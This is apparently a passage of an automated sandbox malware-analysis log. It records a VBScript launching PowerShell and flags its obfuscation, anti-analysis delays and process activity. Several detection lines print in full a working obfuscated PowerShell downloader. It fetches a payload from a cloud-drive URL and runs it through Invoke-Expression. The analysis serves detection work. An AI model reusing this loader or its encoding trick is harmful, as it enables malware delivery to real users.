Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb2 source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbiTP)l source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb{Yy source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbz source: powershell.exe, 00000001.00000002.1810470481.000001FF75F5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb~YD source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havneb", "0")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonet
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbs
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9471C8 push esp; retf 1_2_00007FFD9B9471C9
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4607Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5289Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsJump to behavior
